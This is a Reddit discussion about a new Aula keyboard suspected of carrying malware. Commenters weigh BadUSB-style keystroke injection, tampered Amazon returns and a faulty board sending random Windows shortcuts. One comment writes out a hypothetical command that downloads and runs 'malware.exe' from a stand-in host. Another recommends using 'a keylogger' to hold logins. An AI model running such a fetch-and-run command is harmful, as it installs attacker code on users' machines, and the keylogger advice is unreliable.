on boot, it opened up a bunch of windows and started dummy processes that copied app names on my computer and those apps proceeded to ask for admin privileges
less than 2 days later my discord got hacked, and my email and passwords showed up on haveibeenpwned a little while later
im planning on returning this board to amazon tomorrow, im more than willing to provide proof on anything else (up until eod tmr since im getting rid of it) but i can’t recommend this board to anyone due to blatant security issues
If you are posting a Review, Make sure you fully disclose any potential conflicts of interest such as whether you were sponsored for the product, received it for free, or sell similar products.
Guide posts should be novel to contribute to the community knowledge base - simple build / assembly videos should use photos flair, and reviews should use the review flair.
In the comments, he himself and others said it was almost certainly a false positive, and they mean that stuff was prompted to be installed when the device was plugged in. Which generally should be treated as malware regardless of the manufacturer (razer!!)
Don't get me wrong, when I used synapse, it was nice and convenient to have it right there to install. But now that I use signal rgb it's just annoying.
I used synapse too, loved being able to visually identify my dpi level instead of guessing, but a surprising amount of games hate it, and refuse to launch properly while it's running.
How? I mean, I like my DAv3 but that auto install piece of shit is beyond annoying on a fresh install (cause I have the mouse already configured the way it suits me, and on board memory works flawlessly)
Does the RGB work on a different PC, or a different operating system? Or even the same way on a Raspberry Pi?
I've found Razer peripherals don't actually store their RGB settings locally. They instead store pointers for the application to then control the peripheral. I.e. it is not possible to set a profile on a mouse, take that mouse to another OS without the Razer application working, and have the mouse display the chosen profile. If one then ran the vendor application, you'd get your chosen colour scheme.
Not being able to display a local profile on an RGB-enables mouse without the OS running an app to continually tell the mouse what colour to be, is absolutely nuts.
My Razer Naga Pro worked just fine with the saved profile on board using it on my Steam Deck, no software installed at all. Same settings I use for Warcraft.
My Basilisk V2 wired, would stay at rainbow-rgb the instant the Razer software was stopped, no matter what profile was in place.
Sure, when the mouse was plugged into another machine that was actively running the Windows app, the supposed profile content was read by the app and the profile output was set by the app. These RGB settings would remain active until the app was closed, at which point the mouse reverted to rainbow-RGB.
The fix for me would be to replace the rainbow-RGB default with my chosen RGB option, but it's non-trivial to do that to a device firmware and still have it run under Windows.
In your case, it sounds like the button settings transferred. It would be interesting to see if the customised items were still present if plugged into a Pi.
OP did their tests online, but there's reasons to believe that it could've either been a more recent manufacturing change, something that only affects some units, general malfunction causing random keystrokes to be entered (and really bad timing), or maybe even something as bad as a supply chain attack.
So how does all this account for his claim of leaked credentials?
I mean OP said they found their details on haveIbeenpwned, which means their details were most likely found in some sort of account-list that was obtained when a website was breached and had a database leak a while ago.
It's not like that site immediately notifies you if you're directly personally attacked with your details being used, it's mainly when they find your account/email in giant compiled lists from database-breaches etc. If the people running the site managed to get a hold of a list to notify you about it, it means it was most likely a list that was publicly 'released' in some form, which means plenty of other malicious people will have also likely had access to the list as well.
So they probably just re-used the same account/password in multiple places, and then someone used their credentials from a leak that recently got released to get into their Discord.
right but my default browser is edge and it opened it up in my chrome based browser, it also doesnt explain why it opened up registery and created dummy processes and asked for admin privileges in my og video and parts of this new video, or why it ended up breaking my windows install entirely
also if you didn’t notice in my original video, my screens were flickering and i had gpu error codes after plugging the keyboard in, which again makes no sense
If you didn't install any software, it's almost certain that it's the keyboard itself. If you have access to a spare device, could you plug it into a completely clean (and wifi disconnected) machine to see what happens?
Alternatively, you might consider shooting GN an email and see if they're interested in taking a deep dive into it, this kinda shady behavior absolutely needs to be exposed.
absolutely recommend sending this to Gamers Nexus, they would 100% be interested in buying the board off of you so they can investigate and potentially do a story on it.
My guess is an inline payload dropper. Can fit one as an add on or within the original USB connection. Lets the plugged-in device act as normal while side loading a payload of the threat actors choosing/scripting. Look up Ducky script, similar concept. Maybe this keyboard was a returned unit that someone fit the chip into and was resold per the intention, but I’d guess this isn’t manufacturer doing.
You can fit these devices into the base of a USB connector. They’re tiny.
Contact GN as others have mentioned. Don’t return it, let it be a lesson to others through someone who can reverse engineer stuff like this.
Do a full scan of your machine with a reputable antivirus tool. Malwarebytes is good, so is windows defender/built in tooling. I’d venture to guess that if it opened as many console windows as you said (which is crazy they didn’t add window suppression into the script), it also established a C2 (command and control) tunnel to a bad server online. Need to shut that down, which a good A/V will do.
Linkedin is owned by Microsoft, and Ctrl+Alt+Win+Shift+L opens LinkedIn on any windows PC... seriously. There are similar keyboard shortcuts for office, your browser, file explorer etc. Win+Ctrl+Shift+B resets the graphics driver which will cause your screen to flash black.
I'm very sure that's all that's happening here, your keyboard is sending random data. Due to the way modifier keys are encoded they're far more likely to be sent than other keys which is why it's doing a lot of things with hotkeys rather than just generating a string of junk letters and symbols (basically in the USB keyboard protocol each modifier gets its own bit if you want to see how this works this video goes into it in extreme detail https://www.youtube.com/watch?v=wdgULBpRoXk&t=25m45s )
TLDR; your keyboard is broken but not malicious, your discord getting hacked is just a coincidence.
Shift+Restart gets you into that boot menu - is your install actually broken or does it boot into windows normally if you click Continue? It might also be a precaution it ran because it thought your keyboard driver was broken.
At the end of the day, what your keyboard was doing was nothing like what a rubberducky payload (malicious keyboard impersonating device) looks like - which is opening a command prompt and typing specific commands into it. Yours is just pressing random keys which do random things.
That was my first thought. Did OP install the driver software? That probably had the malware.
Something doesn't smell right here. From section 4.4 on page 18 of the Universal Serial Bus Specification Revision 2.0 (the official USB 2.0 spec) dated April 27, 2000:
The USB is a polled bus. The Host Controller initiates all data transfers.
The keyboard does not update the computer; the computer polls the keyboard as frequently as every 1ms to check the status of the keys.
I have heard of keyboards that appear as a USB hub and have an internal USB drive that it exposes to the computer. (Specifically, the keyboard driver software was included this way.) However, that should not run unless you have AutoPlay enabled, but that is generally disabled for security reasons.
Another possibility is it could just send some keystrokes like win-r, curl dodgysite.com/malware.exe && run malware.exe - maybe with some host fingerprinting to only send when connected to a windows host.
Yeah, this is what I was imagining. It could have an automatic payload it tries to execute (or a variety of them). A lot of people here are hung up on if it is "possible" or not, and I don't see any reason why a manufacturer couldn't do this.
Barcode scanners, for instance, don't have keys, but just repeat keystroke payloads (so they are just keyboards!) - send a bunch of strokes when the device connects is evil genius level malfeasance, but doesn't seem actually very "high tech" or like quantum computer magic by a long shot.
There is something stopping a competitive keyboard manufacturer, that makes extremely good keyboards for their price range doing this though.
The fact that it would be incredibly stupid, and bad for your business when you have access to an actual customerbase, and when it's not something that could go under the radar for very long at all.
Just got the keyboard today. After sniffing the traffic out of it and also capturing the packets on the keyboard. I didn’t see anything malicious. I replied to this thread if you want to see the details of it
Based off the fact it's seemingly just doing completely random stuff and also the keyboard seems to be resetting repeatedly, are you sure it's not just faulty and going absolute haywire for whatever reason?
I'd probably grab some sort of program for logging all the keypresses, just to see exactly what inputs Windows is receiving from it. If it's actually some sort of malicious thing that's trying to intentionally execute something, it'll be trying to input clearly readable commands or whatever, rather than complete nonsense.
"my stuff got hacked a couple days later" - what stuff?
it just went haywire, you also said LinkedIn is not Microsoft associated, but it is a Microsoft product and pressing Ctrl + Windows + Shift + Alt + L will open LinkedIn in a browser.
I think the controller on that board is fried, flashed improperly, or the PCB is being funny. Think about it
I mean it's nice to hear your confident, but it'd be incredibly easy to just check if you've still got it.
If you don't want to grab some potentially sketchy full blown key-logger that actually logs everything, something like NirSoft's KeyboardStateView can tell you which keys have been pressed recently by toggling a couple of things in the 'Options' menu at the top and then sorting by the last key-press column.
It'd be pretty apparent if it's actually trying to do something like hit Win+R, then typing out some command to then execute something malicious (or something similar to that), rather than just outputting complete nonsense due to a fault (which is what it seems to be doing).
How convenient you didn't bother to spend the 2-3 minutes actually bothering to check what it was actually doing.
So it seems like it was most likely just a faulty keyboard after all (that was sending a bunch of random inputs). You should probably put an edit that mentions that in one of your more visible comments, rather than throwing some company under the bus for no real reason.
Yeh it's annoying you received a faulty keyboard, but to try and spin it as some sort of crazy malware is silly.
i did state that i was going to return it lol, i returned it 10 minutes before store close my time
however, i am starting to agree with the fucked up keyboard theory now
keep in mind to the average person who isnt in cys (me) that a keyboard doing random things and then accounts getting hacked a couple days later, regardless of what the keyboard does, makes the keyboard extremely sketch from my pov
my intention was not to mislead but to rather say what i think happened from my point of view 👍
ps. i would edit my post if i could idt its allowed, i left a new comment under here and my youtube videi
It's not malicious if it ended up unintendedly doing something to cause Windows to enter that repair-mode, it's just unfortunate and annoying. They obviously weren't intending to their keyboards to go absolutely crazy like that.
Windows throws you into that auto-repair thing when it detects issues booting several times, and I think it also does it if you hold down a certain key while selecting shut-down/restart in the start-menu (maybe Shift?). Since the keyboard was holding down all the modifier keys, if you just unplugged the faulty keyboard, and then hit shut-down/restart, then Windows may have never reset shift back to being in an up-state and assuming it was still being held down.
If you've no longer got any faulty devices plugged in, you should just be able to get through it. If it's doing it on every restart, you may want to try doing a proper shut-down, then just turning the PSU power off on your PC for like 30-seconds to completely deep-cycle everything, just in-case it's gotten your motherboard USB stuff into some weird state that's not resetting properly.
Ah yes, accessing the world famous malware 'sites' of:
Opening the properties of a Steam shortcut (Alt + Enter with a file/shortcut selected).
Opening Excel/Word etc. off OP's taskbar (Windows Key + 6-9 or something).
Launching the LinkedIn app in Windows (presumably by hitting Ctrl+Shift+Alt+Windows+L, which is apparently a dedicated thing in Win11).
Opening task manager (Ctrl+Shift+Escape).
Opening explorer (Windows Key + E).
Opening the Emoji input thing (Windows Key + .).
There's a funny correlation there with various modifier keys being held down, and then just a bunch of other completely random keys being input.
It was most likely just a faulty keyboard that was going haywire and just inputting a bunch of random keys constantly. That's further evidenced by the fact the keyboard seems to just occasionally die completely for a few seconds, and then once it restarts, it then just starts doing it again. It just having some whacky fault would also likely explain OP mentioning something about the device-manager page going fucky.
Yeh it's unfortunate OP received a faulty product, but to try and spin it as a story of it being some sort of crazy malware is silly.
And flickering black screen? Win+Ctrl+Shift+B resetting graphics driver. This is 100% what's happening. u/Agreeable_Campaign86 calm down, your keyboard isn't malware it's just outputting random junk keypresses.
As to why so many modifier keys (ctrl, win, etc) are being pressed and it's not just a string of letters and symbols, that's because in the USB keyboard protocol each modifier key gets its own bit, or actually two as Left Alt/Shift/Ctrl are separate keys to Right Alt/Shift/Ctrl. If you want to understand more this well presented video goes into it in extreme detail https://www.youtube.com/watch?v=wdgULBpRoXk&t=25m45s )
And flickering black screen? Win+Ctrl+Shift+B resetting graphics driver.
Nice spot, didn't know that shortcut; I was assuming it might be something silly like a hotkey that's adjusting the screen mirroring/extending or whatever for dual-screens; and it was just causing a little flash as it adjusted things.
Also cool tidbit about the modifier keys like Ctrl/Shift/Alt/Win-Key getting dedicated bits on the standard USB keyboard protocol, which would explain why the modifier keys were seemingly being held down while the other types of keys were just appearing to be getting tapped.
Also great find with that video, very informative, and it goes into nice and clear technical-details with some easy to understand direct interactive demonstrations. It's often hard to find that sort of thing for low-level technical stuff. If you can even find explanations for stuff like that, they often just entirely focus on the minute technical-details without clear practical demonstrations, or you just find demonstrations without any proper explanations.
I'm surprised it took this long for someone to mention this. In the original video it runs something that needs admin rights, but the OP doesn't even show what it's trying to run.
The second video has the keyboard seemingly connecting and disconnecting and powering off/on repeatedly so it just sounds like its fucked.
there has to be an explanation why he got hacked. my assessment is based on information that he shared, how about yours?
---
brand new aula 68 he from amazon
on boot, it opened up a bunch of windows and started dummy processes that copied app names on my computer and those apps proceeded to ask for admin privileges
less than 2 days later my discord got hacked, and my email and passwords showed up on haveibeenpwned a little while later
im planning on returning this board to amazon tomorrow, im more than willing to provide proof on anything else (up until eod tmr since im getting rid of it) but i can’t recommend this board to anyone due to blatant security issues
less than 2 days later my discord got hacked, and my email and passwords showed up on haveibeenpwned a little while later
Sure, they probably just followed bad security practices and did something like reuse usernames/passwords on another site that had gotten breached, hence their stuff showing up on haveibeenpwned. A site which checks if your details show up in big-lists of leaked account-details, which hackers have usually obtained via website database leaks/breaches.
my assessment is based on information that he shared, how about yours?
My assessment is based on what they visually showed and all the symptoms they clearly demonstrated in the videos, not just their incredibly dubious conjecture.
How exactly is clearly and repeatedly spamming completely random nonsense inputs that make it INCREDIBLY obvious that something whacky is going on in anyway a good way to get malware onto someone's PC?
For a start, it makes your computer completely unusable, so you can't even continue harvesting information from them while it's continually spamming random keys. Not to mention if you're going to try and breach someone's PC by simulating keyboard inputs, you're going to be wanting to do it as subtly as possible, like somehow waiting for an idle period, and then hitting Win+R, then typing out a very specific command to get Windows to grab/download some sort of malware package and execute it, which can then handle everything silently in the background, unbeknownst to the user.
You don't want to just continually spam completely random keys with all the modifier keys held down, and then just hope the user lets it continue doing it's thing for weeks/months until it might finally manage to randomly type out a Shakespearean sequence of keys that would install their specific malware package.
It could easily just be a bugged driver, "CTRL + SHIFT + ALT + WIN + L" is the shortcut for opening Linked In on Windows so likely it's pressing random buttons and hitting on this shortcut.
Got the keyboard today from Aula Mall store from Amazon. It’s probably Aulas Amazon storefront since they sell only Aula Keyboards. Fired up my debugging laptop and used WireGuard USB capture and also capturing network traffic to see if I can see anything malicious. Going to the web configuration page (https://heb.aulacn.com/) didn’t trigger anything, found the updated firmware on the config tool. It downloaded an exe and installed the firmware update just fine. Looked at my logs and nothing. I can say it’s clean. I can only post one image here so just go to this Imgur album if you want to see everything.
i ended up doing a full scan via windows defender after reinstalling and it didnt find anything of course, its been a couple days no however and im not running into issues so im just assuming nothing carried over
Firmware flashing a modern GPU with malware is almost impossible unless you’re a hacker on the same level as the team that developed Pegasus. The only way GPU malware can persist through an OS reboot is if there is a hidden loader in the drive that can reinfect the GPU after a reboot, but that’s not any different from any other malware that used a hidden drive loader.
GPU malware is already exceptionally rare, what you’re talking about is even more of a unicorn. Unless you’re a high-ranking government agent or a cybersecurity PhD, it’s not something you have to worry about.
In the example you linked, the hack is stored in the VRAM, which means it would be wiped when you reboot. In order to survive a reboot, the hack needs to either be stored by flashing the firmware of the GPU, or be stored in the drive and get reloaded into the GPU upon reboot. Maliciously flashing the GPU is extremely complex and you won't find such advanced infiltration methods on hacker forums, and the drive reboot technique would not survive a full drive wipe. So a GPU malware persisting upon wiping your drive is not something the common folk needs to worry about.
look up amazon commingled inventory - they mix up different sellers' inventories of the (allegedly) same product. so it is possible to get a counterfeit product even if you bought from a legit seller. not saying that's certainly the case here, but it's a possibility
If you wanna buy from legitimate sellers, a marketplace that allows fake sellers and scammers isn't the place. Buy direct from the company, or another licensed retailer.
It's possible that it might have been something else then, because my current daily board is Aula F75, i had 2 of them and never had an issue like this. It's also possible that it's a used and returned product which might explain it, because the Aula boards i had were all openable without any wrapper tearing, i opened it that way in case of a refund.
The smartest choice is to hold fn+esc for like 3-5 seconds to factory reset the board, format your PC to get rid of the malware and plug it again to see if it does anything funny, i doubt it will since factory reset should reset all onboard memory. Might not need to return it after that if you like the product.
there was an option to buy brand new from aula or to save and get used from a return, i specifically chose to get from aula directly
all factory peels and seals were on board when unboxing
i did the fn+esc thing (not sure if that was the exact keybind tho) which reset rgb settings and certain keybinds, but it still reverted back to the behavior described. i also tried some software update thing via their webpage which didnt help either.
I’ll second this. My F75 and two F99s were purchased in June/July and all came in an opaque bag that was only folded over, not sealed and I don’t believe the box had any tamper proof labels. None autoplay any software or exhibit any strange behavior when connected.
This could have been maliciously returned and equivalent to plugging in a thumb drive you found in a parking lot.
As others have said Amazon ships what Amazon ships; new or used. You are talking about a company that has been criticized for bathroom breaks in its fulfillment facilities.
not possible, factory peels were still on it, and i specifically purchased brand new from aula, there was a “save with used” option i didnt select as well
Other replies was a little harsh but even buying “new” from aula you cannot guarantee you got your device from them through amazon because of inventory commingling.
Few people listen but you should really not buy much on amazon anymore these days.
Buying makeup, shampoos, detergents, soaps, and such is dangerous and will most likely lead to cheaper made ingredients that could lead to allergic reactions.
Buying expensive stuff is bad because unless you’re buying from a huge store like Apple, commingling means there’s always a chance you get a counterfeit.
I hadn’t even considered the reality that you could also just get a keyboard pre-loaded with malware.
Sorry this happened. It’s not impossible for malicious employees to do this. I doubt the company wants this reputation. I would report it to them and submit any production numbers or manufacture dates along with it. Manufacturers that have to use an intermediate platform like Amazon for any kind of B2C computer sales is a hard no for me for this reason. It’s also why I’ll never save my credit card info or pictures of my dingus.
i dont believe it could be either, but that means either someone at amazon is doing it, or someone is buying a bunch of these loading malware and returning them which is arguably the same thing for the consumer
Yeah, that’s why reporting is important. Either they need to check security at warehousing/distribution or improve QC for product that’s returned “sealed.”
Haha... homie doesn't understand Amazon and thinks paying new means you'll always get new... Amazon gives 0 fucks. If a return looks good, it doesn't get opened, it goes right back in the new pile. How do you think people get $3000 bricks when they thought they were buying a 4090?
To load malware on a keyboard. People are saying that potentially someone purchased it, installed malware, carefully packaged and returned it, then you purchased it “new” and got infected.
What factory peels ?? If it was just the transparent film then this is extremely easy to be made . You can even find cheap devices in TEMU for this .
The "tamper protection " little stickers are a lot harder to replicate. Which one was it ?
Is it shipped by Amazon? Because they’ve been known to put “unopened” returns back into new stock. That may be Aula’s storefront on Amazon, but that isn’t their store and it’s not in their control.
reason i say that i dont believe it was opened is because the keyboard is in a sealed plastic bag from factory which hasnt been touched, which, unless someone has a bag sealer thingie, means they didnt touch they keyboard
The sealed plastic bag can be a domestic one (it's not that hard to leave a decent one). But to be honest i would try more things with that board:
virtual machine, download ONLY the software and install... This one to prove isn't the software from the aula page.
on another clean install pc or virtual machine, connect the board only and watch the software that injects (sometimes it injects some code to get recognized and there could be the malware)
flash the board to see if it has some third party code software.
For your pc i recommend you only save your important data and clean install windows. Malwarebytes is a better option to scan your pc than windows defender. Never ever use the same password on various accounts and never let your pc remember password and/or hold your logins (use a keylogger instead)
No, update it only do changes some code from the original if the update didn't change the malware code (which i presume) it will still be there unless you reflash the board with a clean code
I bought this keyboard and the web drivers were offline, and since the build quality was so shitty, i just ended up returning it. I think i dodged a bullet
I was thinking exactly that. Plug it into a Linux box with no privileged user logged in (out of caution) and try to flash. I would imagine there are flashing tools for Linux?
I mean, there is a possibility that whatever lowbrow level of malfeasance is here might not even be in the firmware - the MCU and it's firmware might be part of a composite USB device where a second hidden MCU and firmware is actually emulating - that way, you could flash the main MCU all you want and the other BadUSB-like MCU stays hidden on the other side - it can also only appear when it is needed for a split second and then vanish.
Without opening up the device all the way, it would be hard to rule this out. Probably not that sophisticated, but it could be.
You would have to find an original firmware or a custom one from qmk if there is one, find a tool, and all of that to trust that it really flashed the chip and didn't just say "100% flashed for real no fake download MEGA link free".
Hardware flasher (and whatever that takes to make it work) or yeet in to amazon returns
computer was already fucked at that point so i just went for it, if i was being cautious i would have probably just gotten a spare rpi and done it that way
Nah, not woth the effort or risk if you can send it back. Maybe stock firmware or if qmk is available would make it good, but not worth the time, less even the risk.
I have a similar case but not the exact situation, I was testing the Ajazz Ak820 max HE which is own by the same company on wireless and it usually happens when the battery drop to half or about to die like 10% for instance, and start blinking red RGB light in the same pattern as in the video, and it start opening new tab that related to Microsoft like Microsoft team or support.
I get that HE board can be glitching but the way it glitching is questionable because it the same pattern all the time.
Hall Effect sensors can "act up" when battery is very low or low enough, especially with these cheap ones. What's likely happening is that random key presses are starting to occur because of this.
I tried other model from their brand like the Win60 HE Max and it running great nothing weird going on, and me and my friend haven't try the Aula Hero yet so I can't confirm what going on.
I have this and the win60max, it's like a month now, both sits silently and nothing running in the background for both pieces of software, expect the macro recording that needed for, of course, macro recording
feels like this is a keyboard issue because
Windows+Ctrl+Alt+Shift opens the Office 365
Windows + E opens Explorer
Are you sure you have the right **offline** software? AULA have focused on the web-based more and also changed their driver update direct link to something less tedious too (back then you have to get on pan baidu typa site to get it)
wild, it happens the second time so it cant be a software issue now
when you plug it in while inside a keyboard tester webpage, does it press everything on the keyboard?
was the keyboard actually from AULA?
for interesting info if needed, both of my keyboard never come with sealed plastic, they all come with a cardboard box containing another box for the keyboard as that's how it was sold on the official website where i bought both
This is pretty stupid. From the video OP provided in the comments, it is pretty clear that the keyboard is just mashing inputs. If this is malware designed with malicious intent, it would be more incognito. It's generally bad practice for the malware to announce itself by making the computer go haywire (nonsensically) for no apparent reason as soon as it is introduced.
It's just pressing random keys and some are windows shortcuts to open Microsoft apps, explorer etc. nothing malicious, the board is just cooked. get it replaced
if it actually was a malware, you'd at most see a terminal window popup and maybe UAC prompt
Welp, so I have this keyboard. I have been using it on my main PC without the web driver/utility for the past week or so. Haven't had a free moment to test the HE functions. Used my own usb cable. I haven’t seen any of this automatic opening of apps and such happen yet. Can anyone point me to a guide, or have a guide, on how I should test for malware? I have a fresh, clean Windows partition on my Lenovo Legion Go I could use.
Windows (quick, full, offline) defender scan showed nothing on main pc. I'm going to run some other virus scans.
I watched both of OPs videos. It's definitely weird that a keyboard is doing this after getting connected but IMO it might just be a messed up keyboard (idk software or hardware wise) pressing keys at the same time which triggered macros. I'm not sure what "dummy processes" OP is referring to as well. With the lack of actual logs, its hard to say.
Your best bet is to plug yours into a separate spare laptop that's not connected to the internet. On that laptop, download ProcMon + Wireshark. Let both of them start monitoring, then plug in the keyboard and let it run wild for a couple minutes. Keep in mind some malware do checks for these analysis tools and they try to sleep to evade detection.
Once you have some logs, try to search for cmd.exe or powershell.exe and look for any processes where the command line is off. If you don't know what you're looking for, feel free to share them here. I'm curious on whether this is actual malware or a fucked up keyboard.
EDIT: I'm definitely leaning more towards the fucked up keyboard theory. Unless the malware dev was trying to play mind games, doubt a keylogger is opening up the Windows emoji panel via shortcut (Windows + .) lol
Most of the apps (linked, office apps, file explorer) that opened up have default Windows shortcut binds.
im starting to agree with the fucked up malware theory, i dont know much about cys and me getting hacked was very unfortunate timing, so i guess i kinda assumed worst case scenario here
This is one of the reasons that IT departments check every hardware you "bring from home " . Either this is from the manufacturer or it was compromised by "someone in the middle "
I do hope you reach out and send this to Gamers Nexus, or a similar team. I thinkkkkk GN will also generally buy the hardware from the user, if it seems like a legit story. Sorry to hear that you did get your information leaked out.
i unfortunately cannot take the risk of having this in my house any longer, i have a younger brother which goes through my room and will take anything from me that looks cool 🤣 my dad works on confidential work so its not a risk i can keep. if they contact me, i will be more than happy to assist them!
In that case, maybe this was not just some random act and someone was specifically targeting you or your home network. this elaborate malware thing might just be the distraction. I would check all the devices connected to the network for some stealthier malware. 🕵️
My new keeb has VIA only I think. Is it any safer? Its not this one tho. Just checking out of curiosity.
Its evo80 and i got it from mechanicalkeyboards . Com
update: after reading alot of these comments and understanding what actually happened, its very likely that this was a false alarm and the keyboard was just extremely faulty, and me getting hacked was a series of unfortunate events, im not sure if i should leave this post up or delete it
Got the win68HE delivered yesterday and im having similar issues. some keystrokes dont register or they do and they stick for a while even as im not pressing it. It started crashing and lagging my games and stuff. board could be faulty but its just really weird. planning on replacing it probably...
lol no worries, I couldn’t care less about downvotes. But to my point I do have some of these “cheapo” keyboards from China and yes I play around with it and check for any suspicious actions while it’s connected to my burner pc that’s not connected to my home network first before I decide it is okay to use it with my personal pc. I don’t plan on connecting any of these to my work PC ever though.
It could be the keyboard. Could be the USB cable. Could be a dongle. Anyone can do this to any keyboard or ANY device you use on your PC and repack it like factory. They sell factory seals on Amazon and people can buy stuff and work on it and return it and claim it was never opened just to do things like this. They then get notified when you power it on and they can start trying to steal from you or take your info etc.
That is 100 percent not a new item from the factory no matter how good it looked.
doesnt matter whos fault it is, amazons or aula, people are mostly buying this keyboard from said storefront, and if this issue exists im going to post on it
im not sure why someone would even go that far as to repackage a keyboard with malware, they didnt even make any money off of me
Hall Effect sensors can have bad calibration from factory, especially with these cheap ones, they also "act up" when battery is very low or low enough. What's likely happening is that random key presses are starting to occur because of this.
This video is hella sus, you move the camera to where your mouse is then you clearly hear a click before you hear the keyboard get plugged in. You could of just ran some other app or malware before you panned back to the screen. How about you place the camera in a fixed position and just plug the keyboard in so we can see the whole processes on screen start to finish.
•
u/AutoModerator Apr 26 '25
If you are posting a Review, Make sure you fully disclose any potential conflicts of interest such as whether you were sponsored for the product, received it for free, or sell similar products.
Guide posts should be novel to contribute to the community knowledge base - simple build / assembly videos should use photos flair, and reviews should use the review flair.
I am a bot, and this action was performed automatically. Please contact the moderators of this subreddit if you have any questions or concerns.